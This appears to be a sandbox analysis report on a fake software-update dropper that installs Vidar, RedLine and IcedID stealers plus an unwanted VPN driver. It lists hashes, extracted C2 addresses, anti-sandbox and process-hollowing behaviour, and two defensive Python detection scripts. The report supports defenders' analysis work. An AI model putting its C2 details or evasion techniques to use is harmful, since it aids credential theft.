Analysis
max time kernel: 86s
max time network: 719s
platform: windows10_x64
resource: win10-en-20210920
submitted: 21-10-2021 13:12
Static task: static1
General
Target: Software-update-patc_579570356.sfx.exe
Size: 28.5MB
MD5: b64a9d5a67665275d9cbb1d320f1361a
SHA1: 3935a3994cb12a69ece3517a63eb35820761feaf
SHA256: 28b8658e761beebef9578a13e60f231b7bd5af81107210c06ac108276e9447b9
SHA512: 261b47e9218c1531b31ea4ba9a7aa89d5a28b7f0c4c8e4b8196acec7cbd107b31c169eb2fdcde324eeb5e8427298508d39260da82026125c199b2d146cf71d37
Note: the .sfx.exe name and 28.5MB size mark this as a self-extracting archive. The hashes above identify the outer dropper only; the executables it unpacks (listed under "Executes dropped EXE") have their own hashes and should be tracked separately.
Malware Config
Extracted: vidar
  version: 41.5
  botnet / profile_id: 223
  C2 (dead-drop profile): https://mas.to/@xeroxxx
  Note: Vidar does not take tasking from this address. It fetches the Mastodon profile and parses the live C2 address out of the profile text, so the host that actually receives stolen data is whatever the profile pointed at during the run. Block or monitor the profile URL, but expect the real C2 to be a different host that only the profile reveals.
Extracted: redline
  botnet: 123ikjrvd
  C2: 87.251.71.82:80
Extracted: icedid
  campaign: 1926014661
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro. For wmiprvse.exe specifically, the more common cause is a caller invoking Win32_Process.Create over WMI: the WMI provider host becomes the parent of whatever command was requested, so a rundll32.exe child of wmiprvse.exe is a strong sign of WMI-based execution rather than an exploit of WMI itself.
Processes: rundll32.exe, rundll32.exe
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process; pid 672; pid_target 2496; process rundll32.exe
  description: Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process; pid 4516; pid_target 2496; process rundll32.exe
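The check behind this signature is simple to reproduce on your own process-creation telemetry (Sysmon Event ID 1, EDR process events). The example below is added here and is not code from the sandbox or from the sample; it encodes a small parent/child policy and runs it over constructed event records. The two wmiprvse.exe records reuse the PIDs and image names from this report; the explorer.exe and WINWORD.EXE records, and their parent PIDs, are invented for contrast.

```python
"""Flag process-creation events whose parent should not be spawning
that child (the logic behind "Process spawned unexpected child process").

Added example; not the sandbox's code. Event records are constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Set

# Children that are unexpected under an Office parent: the usual
# living-off-the-land binaries a macro would launch.
LOLBINS: Set[str] = {
    "cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "msiexec.exe",
}

# Parent image -> set of unexpected children, or None meaning *any* child
# is unexpected. wmiprvse.exe hosts WMI providers and has no business
# creating processes unless someone called Win32_Process.Create.
POLICY: Dict[str, Optional[Set[str]]] = {
    "wmiprvse.exe": None,
    "winword.exe": LOLBINS,
    "excel.exe": LOLBINS,
    "outlook.exe": LOLBINS,
}


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    image: str          # full path of the new process
    parent_pid: int
    parent_image: str   # full path of the parent


@dataclass(frozen=True)
class Finding:
    parent_pid: int
    parent_image: str
    pid: int
    image: str
    reason: str


def basename(path: str) -> str:
    """Case-folded file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unexpected_children(events: Iterable[ProcessEvent]) -> List[Finding]:
    """Return one Finding per event that violates POLICY."""
    findings: List[Finding] = []
    for ev in events:
        parent, child = basename(ev.parent_image), basename(ev.image)
        if parent not in POLICY:
            continue
        unexpected = POLICY[parent]
        if unexpected is None or child in unexpected:
            findings.append(Finding(
                ev.parent_pid, ev.parent_image, ev.pid, ev.image,
                f"Parent {ev.parent_image} is not expected to spawn {child}",
            ))
    return findings


# Constructed sample: the first two rows mirror the report, the rest are invented.
SAMPLE_EVENTS = [
    ProcessEvent(672, r"C:\Windows\System32\rundll32.exe",
                 2496, r"C:\Windows\system32\wbem\wmiprvse.exe"),
    ProcessEvent(4516, r"C:\Windows\System32\rundll32.exe",
                 2496, r"C:\Windows\system32\wbem\wmiprvse.exe"),
    ProcessEvent(4556, r"C:\Users\Admin\AppData\Local\Temp\Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe",
                 3100, r"C:\Windows\explorer.exe"),            # invented parent pid
    ProcessEvent(7000, r"C:\Windows\System32\cmd.exe",
                 6900, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),  # invented
    ProcessEvent(7100, r"C:\Windows\System32\notepad.exe",
                 6900, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"),  # invented
]

if __name__ == "__main__":
    for f in unexpected_children(SAMPLE_EVENTS):
        print(f"{f.parent_pid} -> {f.pid}: {f.reason}")
```

Both rundll32.exe children of wmiprvse.exe and the cmd.exe child of WINWORD.EXE are flagged; notepad.exe under Word and the keygen under explorer.exe are not. Tune POLICY to your estate: build servers and management agents legitimately create processes through WMI, so add those parents' children to an allow-list rather than muting the rule.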
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
  behavioral1/memory/5040-306-0x0000000000400000-0x000000000041E000-memory.dmp  family_redline  (PID 5040, ZembraBro.exe; full image region 0x400000-0x41E000)
  behavioral1/memory/5040-307-0x000000000041852A-mapping.dmp  family_redline  (PID 5040, ZembraBro.exe)
  behavioral1/memory/3668-351-0x0000000000438ECE-mapping.dmp  family_redline  (PID 3668)
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
  \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll  acprotect
  \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll  acprotect
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
Processes:
  behavioral1/memory/2964-256-0x0000000000400000-0x00000000009A4000-memory.dmp  family_vidar  (PID 2964, Zembra.exe; image region 0x400000-0x9A4000)
Blocklisted process makes network request 9 IoCs
Processes: MsiExec.exe, cmd.exe
  flow 77  pid 2284  MsiExec.exe
  flow 79  pid 2284  MsiExec.exe
  flow 81  pid 2284  MsiExec.exe
  flow 83  pid 2284  MsiExec.exe
  flow 85  pid 2284  MsiExec.exe
  flow 86  pid 2284  MsiExec.exe
  flow 86  pid 2284  cmd.exe
  flow 86  pid 2284  cmd.exe
  flow 86  pid 2284  cmd.exe
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
Processes: DrvInst.exe
  File opened for modification  C:\Windows\System32\drivers\SETA14D.tmp  DrvInst.exe
  File created                  C:\Windows\System32\drivers\SETA14D.tmp  DrvInst.exe
  File opened for modification  C:\Windows\System32\drivers\tap0901.sys  DrvInst.exe
Note: tap0901.sys is the TAP-Windows virtual network adapter driver used by OpenVPN-based clients; here it is installed by the bundled MaskVPN installer (vpn.tmp, tapinstall.exe) rather than written by the stealers. The relevant finding is that a dropper delivered as a fake software update installs a kernel driver at all, and that an unwanted VPN adapter now exists on the host.
Executes dropped EXE 28 IoCs
Processes:
  pid 4556  Recovery_Toolbox_For_Cd_Free_2_serial_keygen.exe
  pid 644   Software-update-patc_535592163.exe
  pid 1196  Software-update-patc_535592163.tmp
  pid 1088  Exercitationem.exe
  pid 1312  UR1E1OJkSMSPSwU0.exe
  pid 4916  UR1E1OJkSMSPSwU0.exe
  pid 4720  kahRa2R1.exe
  pid 4880  oAKAmWkbAngMjKcBt.exe
  pid 4024  vpn.exe
  pid 4536  vpn.tmp
  pid 1132  Software-update-patc_988440081.exe
  pid 5024  Software-update-patc_988440081.tmp
  pid 2964  Zembra.exe
  pid 3684  Software-update-patc_988440081.exe
  pid 4208  tapinstall.exe
  pid 4196  Software-update-patc_988440081.tmp
  pid 3156  tapinstall.exe
  pid 1844  mask_svc.exe
  pid 908   mask_svc.exe
  pid 1604  mask_svc.exe
  pid 2120  Software-update-patc_612604768.exe
  pid 2336  Software-update-patc_612604768.tmp
  pid 4968  Conhost.exe
  pid 1680  5.exe
  pid 5056  Software-update-patc_612604768.exe
  pid 4336  Software-update-patc_612604768.tmp
  pid 5040  ZembraBro.exe
  pid 4080  Quibusdam.exe
Modifies Windows Firewall 1 TTPs
-
UPX packed file 2 IoCs
Processes:
  \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll  upx
  \Users\Admin\AppData\Local\Temp\is-D0LKD.tmp\ApiTool.dll  upx
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Zembra.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  Zembra.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   Zembra.exe
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
Processes: Zembra.exe
  Key opened  \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Wine  Zembra.exe
Loads dropped DLL 34 IoCs
Processes (pid, process, number of loads):
  pid 1196  Software-update-patc_535592163.tmp  x1
  pid 4880  oAKAmWkbAngMjKcBt.exe               x1
  pid 4536  vpn.tmp                             x8
  pid 5024  Software-update-patc_988440081.tmp  x1
  pid 1788  MsiExec.exe                         x2
  pid 2284  MsiExec.exe                         x10
  pid 4196  Software-update-patc_988440081.tmp  x1
  pid 2964  Zembra.exe                          x2
  pid 2336  Software-update-patc_612604768.tmp  x1
  pid 1604  mask_svc.exe                        x6
  pid 4336  Software-update-patc_612604768.tmp  x1
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 IoCs
Queries EnableLUA under the system policy key; a value of 0 means UAC prompts are disabled, which malware uses to decide whether elevation will be silent.
Processes: Zembra.exe
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  Zembra.exe
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes: oAKAmWkbAngMjKcBt.exe, msiexec.exe
  oAKAmWkbAngMjKcBt.exe  File opened (read-only)  \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:  (24 drive letters; every letter except C: and D:)
  msiexec.exe            File opened (read-only)  \??\A: \??\B: \??\E: \??\F: \??\G: \??\H: \??\I: \??\J: \??\K: \??\L: \??\M: \??\N: \??\O: \??\P: \??\Q: \??\R: \??\S: \??\T: \??\U: \??\V: \??\W: \??\X: \??\Y: \??\Z:  (24 drive letters; every letter except C: and D:)
Note: Windows Installer probing every volume is normal costing behaviour during an MSI install, so the msiexec.exe half of this signature is expected. The same sweep from oAKAmWkbAngMjKcBt.exe, a dropped executable with a random name, is the part worth attention.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
  flow 160  ipinfo.io
  flow 161  ipinfo.io
  flow 165  ip-api.com
  flow 178  ipinfo.io
  flow 334  ipinfo.io
  flow 395  ipinfo.io
  flow 397  ipinfo.io
  flow 554  ipinfo.io
  flow 555  ipinfo.io
  (eight requests to ipinfo.io, one to ip-api.com)
Drops file in System32 directory 17 IoCs
Processes: DrvInst.exe, DrvInst.exe, tapinstall.exe
  File opened for modification  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC3.tmp  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\oemvista.inf  DrvInst.exe
  File opened for modification  C:\Windows\System32\CatRoot2\dberr.txt  DrvInst.exe
  File created                  C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC4.tmp  DrvInst.exe
  File created                  C:\Windows\System32\DriverStore\drvstore.tmp  DrvInst.exe
  File created                  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC3.tmp  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}  DrvInst.exe
  File created                  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC4.tmp  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\tap0901.cat  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC5.tmp  DrvInst.exe
  File created                  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\SET9DC5.tmp  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\Temp\{2b9325fb-863c-0044-a585-e6495665f331}\tap0901.sys  DrvInst.exe
  File opened for modification  C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat  DrvInst.exe
  File created                  C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF  tapinstall.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes: Zembra.exe, mask_svc.exe, mask_svc.exe, mask_svc.exe
  pid 2964  Zembra.exe
  pid 1844  mask_svc.exe
  pid 908   mask_svc.exe
  pid 1604  mask_svc.exe
Suspicious use of SetThreadContext 2 IoCs
Processes: UR1E1OJkSMSPSwU0.exe, 5.exe
  PID 1312 set thread context of 4916  UR1E1OJkSMSPSwU0.exe -> UR1E1OJkSMSPSwU0.exe  (a second, suspended copy of itself)
  PID 1680 set thread context of 5040  5.exe -> ZembraBro.exe  (the process in which the RedLine payload was later found in memory)
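A SetThreadContext row on its own only says that one process rewrote another thread's registers, the usual last step of process hollowing. It becomes actionable when joined with the in-memory YARA hits from the "RedLine Payload" and "Vidar Stealer" sections: the target PID of the thread-context call that also carries a family hit is the hollowed host, and the source PID is the loader. The example below is added here (not sandbox or sample code); its inputs are constructed from the rows in this report, and the resource-name grammar it parses is the one visible in those rows.

```python
"""Join SetThreadContext events with memory YARA hits to separate the
injector from the hollowed host process.

Added example, not the sandbox's code. Inputs are constructed from the
report's own rows.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Sequence, Tuple

# behavioral1/memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp  (full region dump)
MEMORY_DMP = re.compile(
    r"^behavioral\d+/memory/(?P<pid>\d+)-\d+-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")
# behavioral1/memory/<pid>-<seq>-0x<addr>-mapping.dmp  (hit inside a mapped region)
MAPPING_DMP = re.compile(
    r"^behavioral\d+/memory/(?P<pid>\d+)-\d+-0x(?P<addr>[0-9A-Fa-f]+)-mapping\.dmp$")


@dataclass(frozen=True)
class ThreadContextEvent:
    source_pid: int
    source_image: str
    target_pid: int
    target_image: str


@dataclass
class Hollowing:
    injector_pid: int
    injector_image: str
    host_pid: int
    host_image: str
    families: List[str]   # malware families seen in the host's memory


def parse_yara_hit(resource: str, rule: str) -> Tuple[int, str, Tuple[int, int]]:
    """Return (pid, rule, (start, end)); a mapping hit has start == end."""
    m = MEMORY_DMP.match(resource)
    if m:
        return int(m["pid"]), rule, (int(m["start"], 16), int(m["end"], 16))
    m = MAPPING_DMP.match(resource)
    if m:
        addr = int(m["addr"], 16)
        return int(m["pid"]), rule, (addr, addr)
    raise ValueError(f"unrecognised resource name: {resource}")


def _family(rule: str) -> str:
    return rule[len("family_"):] if rule.startswith("family_") else rule


def families_by_pid(yara_hits: Sequence[Tuple[str, str]]) -> Dict[int, List[str]]:
    out: Dict[int, List[str]] = {}
    for resource, rule in yara_hits:
        pid, rule, _ = parse_yara_hit(resource, rule)
        fams = out.setdefault(pid, [])
        if _family(rule) not in fams:
            fams.append(_family(rule))
    return out


def correlate(events: Sequence[ThreadContextEvent],
              yara_hits: Sequence[Tuple[str, str]]) -> List[Hollowing]:
    """One Hollowing per cross-process SetThreadContext, tagged with any
    family found in the target's memory (empty list if none was dumped)."""
    fams = families_by_pid(yara_hits)
    return [Hollowing(ev.source_pid, ev.source_image, ev.target_pid, ev.target_image,
                      fams.get(ev.target_pid, []))
            for ev in events if ev.source_pid != ev.target_pid]


def uncorrelated_hits(events: Sequence[ThreadContextEvent],
                      yara_hits: Sequence[Tuple[str, str]]) -> Dict[int, List[str]]:
    """Family hits in processes nobody injected into: the payload ran as
    its own dropped executable, or the injection was not observed."""
    targets = {ev.target_pid for ev in events}
    return {pid: fams for pid, fams in families_by_pid(yara_hits).items() if pid not in targets}


# Constructed from the report's SetThreadContext and YARA rows.
SAMPLE_EVENTS = [
    ThreadContextEvent(1312, "UR1E1OJkSMSPSwU0.exe", 4916, "UR1E1OJkSMSPSwU0.exe"),
    ThreadContextEvent(1680, "5.exe", 5040, "ZembraBro.exe"),
]
SAMPLE_YARA = [
    ("behavioral1/memory/5040-306-0x0000000000400000-0x000000000041E000-memory.dmp", "family_redline"),
    ("behavioral1/memory/5040-307-0x000000000041852A-mapping.dmp", "family_redline"),
    ("behavioral1/memory/3668-351-0x0000000000438ECE-mapping.dmp", "family_redline"),
    ("behavioral1/memory/2964-256-0x0000000000400000-0x00000000009A4000-memory.dmp", "family_vidar"),
]

if __name__ == "__main__":
    for h in correlate(SAMPLE_EVENTS, SAMPLE_YARA):
        print(f"{h.injector_image} ({h.injector_pid}) hollowed {h.host_image} ({h.host_pid}): {h.families or 'no family hit'}")
    print("hits without an observed injector:", uncorrelated_hits(SAMPLE_EVENTS, SAMPLE_YARA))
```

Run on this report's rows it reports 5.exe (1680) as the loader that hollowed ZembraBro.exe (5040) with RedLine, and UR1E1OJkSMSPSwU0.exe hollowing a copy of itself with no family hit recorded. The Vidar hit in Zembra.exe (2964) and the second RedLine hit in PID 3668 have no matching SetThreadContext row, which is what you expect when a dropped executable simply runs its payload in its own address space, or when the injection technique used is not the one this signature watches.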
autoit_exe 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
  C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe  autoit_exe
  C:\Users\Admin\AppData\Local\Temp\B4c6oRcW\kahRa2R1.exe  autoit_exe
Drops file in Program Files directory 64 IoCs
Processes: Software-update-patc_535592163.tmp, vpn.tmp, Software-update-patc_612604768.tmp, Software-update-patc_988440081.tmp, Software-update-patc_612604768.tmp, Software-update-patc_988440081.tmp
vpn.tmp (35), under C:\Program Files (x86)\MaskVPN\:
  File created: is-HKTVJ.tmp, is-SCE9C.tmp, is-DHBUP.tmp, is-EU5MI.tmp, is-2ST2R.tmp, is-40APF.tmp, is-TBBFA.tmp, is-L8HEU.tmp, is-JN6J2.tmp, is-EIHGF.tmp, is-EDLVS.tmp, unins000.dat
  File created: driver\winxp32\is-Q65C1.tmp, driver\winxp32\is-290P5.tmp, driver\winxp32\is-NN0LO.tmp, driver\winxp32\is-2HAF1.tmp, driver\winxp32\is-9DK99.tmp
  File created: driver\winxp64\is-83JLN.tmp, driver\winxp64\is-9SNCV.tmp, driver\winxp64\is-O5QNI.tmp
  File created: driver\win732\is-9U2VP.tmp, driver\win732\is-EKM3P.tmp
  File created: driver\win764\is-3GU03.tmp, driver\win764\is-D22U8.tmp, driver\win764\is-2TCSS.tmp, driver\win764\is-F01TK.tmp
  File opened for modification: unins000.dat, MaskVPNUpdate.exe, libeay32.dll, libCommon.dll, mask_svc.exe, driver\win732\tapinstall.exe, driver\win764\tapinstall.exe, driver\winxp32\devcon.exe, driver\winxp64\devcon.exe
Software-update-patc_535592163.tmp (12), under C:\Program Files (x86)\Ut\:
  File created: sed\is-OALV3.tmp, sed\is-TP6UB.tmp, quam\is-BEU30.tmp, quam\is-80L6D.tmp, quam\is-AAQLN.tmp, quam\is-NDI2I.tmp, quia\is-0ONTL.tmp, quia\is-7SPH9.tmp, quia\is-6AHES.tmp, magni\is-EEL29.tmp
  File opened for modification: unins000.dat, quam\Exercitationem.exe
Software-update-patc_988440081.tmp (2), under C:\Program Files (x86)\Ut\:
  File created: is-KFB0U.tmp, magni\is-EN1SQ.tmp
Software-update-patc_612604768.tmp (15), under C:\Program Files (x86)\Dolore\:
  File created: is-UTBU6.tmp, is-484P6.tmp, minus\is-H35Q0.tmp, minus\is-RIR0K.tmp, consectetur\is-BIC3Q.tmp, consectetur\is-01BKM.tmp, in\is-V8F3N.tmp, in\is-R3306.tmp, in\is-1EMSC.tmp, in\is-MDFRB.tmp, quia\is-T3LMG.tmp, quia\is-RSP80.tmp, quos\is-9AON5.tmp
  File opened for modification: unins000.dat, quia\Quibusdam.exe
Note: the is-XXXXX.tmp names, unins000.dat and the *.tmp setup processes are Inno Setup conventions; the lorem-ipsum directory names (Ut, Dolore, quam, quia, consectetur) are the generated folder layout of the fake-update installers.
Drops file in Windows directory 26 IoCs
Processes: msiexec.exe, DrvInst.exe, DrvInst.exe, svchost.exe, tapinstall.exe, MicrosoftEdge.exe
  File opened for modification  C:\Windows\Installer\MSI91FF.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI9D4D.tmp  msiexec.exe
  File created                  C:\Windows\Installer\inprogressinstallinfo.ipi  msiexec.exe
  File opened for modification  C:\Windows\INF\setupapi.dev.log  DrvInst.exe
  File opened for modification  C:\Windows\Installer\MSI9FDF.tmp  msiexec.exe
  File created                  C:\Windows\Installer\f76873d.msi  msiexec.exe
  File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI8DD5.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI9087.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI9CBF.tmp  msiexec.exe
  File opened for modification  C:\Windows\INF\setupapi.dev.log  DrvInst.exe
  File opened for modification  C:\Windows\inf\oem2.inf  DrvInst.exe
  File opened for modification  C:\Windows\INF\setupapi.dev.log  svchost.exe
  File created                  C:\Windows\INF\oem2.PNF  DrvInst.exe
  File opened for modification  C:\Windows\Installer\MSIA129.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\f76873d.msi  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI8F0F.tmp  msiexec.exe
  File opened for modification  C:\Windows\INF\setupapi.dev.log  tapinstall.exe
  File created                  C:\Windows\inf\oem2.inf  DrvInst.exe
  File opened for modification  C:\Windows\Installer\  msiexec.exe
  File created                  C:\Windows\rescache\_merged\3720402701\2274612954.pri  MicrosoftEdge.exe
  File opened for modification  C:\Windows\Installer\MSI8AD7.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI9423.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI9DBB.tmp  msiexec.exe
  File created                  C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F}  msiexec.exe
  File opened for modification  C:\Windows\Debug\ESE.TXT  MicrosoftEdge.exe
Note: C:\Windows\inf\oem2.inf and oem2.PNF are the installed copy of the TAP driver package; C:\Windows\Installer\f76873d.msi is the cached MSI and the SourceHash GUID is its product code, both useful for confirming the install on other hosts.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Note: "likely ransomware" is the signature's generic wording. In this run the storage probing comes from the installer (msiexec.exe) and from oAKAmWkbAngMjKcBt.exe (see "Enumerates connected drives"), and no file-encryption activity is recorded anywhere in the report; read it as reconnaissance by an installer and an infostealer, not as an encryption attempt.
-
Program crash 18 IoCs
Processes (WerFault.exe pid -> crashed process):
  6424 -> 8.exe (pid 6020)
  7428, 7980, 5548, 2112, 5420, 6272 -> setup.exe (pid 4500)
  7564, 7964, 3680, 7876, 4400 -> rDuszRYcVapYdiu1d2yWoFFu.exe (pid 1840)
  7672, 8116, 7496, 6972, 5064 -> tzhXPiwxaSuXjvgggWPEBDSn.exe (pid 7096)
  12860 -> E40E.exe (pid 14160)
Note: none of the crashed images (8.exe, setup.exe, rDuszRYcVapYdiu1d2yWoFFu.exe, tzhXPiwxaSuXjvgggWPEBDSn.exe, E40E.exe) appears in the 28-entry "Executes dropped EXE" list, and PIDs in the taskkill and schtasks sections run past 16000. Several signature lists also stop at exactly 64 entries. The lists shown are therefore a capped sample of the run, not the full process tree; a complete picture needs the raw process and file events, not just the signature summaries.
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Note: every one of these reads is by svchost.exe, DrvInst.exe or tapinstall.exe, the Windows plug-and-play and driver-install components active while the TAP driver was being installed, not by any of the dropped stealers. Treat this signature as a side effect of the driver install; the sample's own anti-sandbox checks are the BIOS, Wine and processor lookups performed by Zembra.exe.
Processes: svchost.exe, DrvInst.exe, tapinstall.exe, tapinstall.exe, DrvInst.exe, svchost.exe
Key prefixes used below:
  CDROM = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000
  DISK  = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000
  (entries marked "upper-case form" were logged with the path written as CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 or DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000)
DrvInst.exe (7):
  Key value queried  CDROM\UpperFilters
  Key value queried  DISK\UpperFilters
  Key opened         CDROM
  Key value queried  DISK\Service
  Key value queried  CDROM\ConfigFlags
  Key opened         CDROM (upper-case form)
  Key opened         DISK (upper-case form)
tapinstall.exe (4):
  Key value queried  CDROM\CompatibleIDs
  Key opened         CDROM (upper-case form)
  Key opened         DISK (upper-case form)
  Key value queried  CDROM\HardwareID
svchost.exe (53):
  Key opened         CDROM
  Key opened         CDROM (upper-case form)
  Key opened         DISK
  Key value queried  CDROM\Capabilities, CDROM\Mfg, CDROM\CompatibleIDs, CDROM\ConfigFlags, CDROM\FriendlyName
  Key value queried  DISK\ConfigFlags, DISK\DeviceDesc, DISK\Mfg
  Key value queried  CDROM\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\, CDROM\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\, CDROM\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\, DISK\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\
  Key opened  CDROM\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008, \0018
  Key opened  CDROM\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C, \0054, \0058, \0052, \004D, \0064
  Key opened  CDROM\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003
  Key opened  CDROM\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003
  Key opened  CDROM\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003, \2002, \2006
  Key opened  CDROM\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A, \0016
  Key opened  CDROM\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008
  Key opened  CDROM\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006
  Key opened  CDROM\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008
  Key opened  CDROM\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005
  Key opened  CDROM\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004
  Key opened  DISK\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005, \0009
  Key opened  DISK\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052, \004D, \005A, \0064, \0051, \0065, \0055
  Key opened  DISK\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008
  Key opened  DISK\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006
  Key opened  DISK\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006
  Key opened  DISK\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009
  Key opened  DISK\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006, \0016
  Key opened  DISK\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009, \0008
  Key opened  DISK\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: Zembra.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  Zembra.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  Zembra.exe
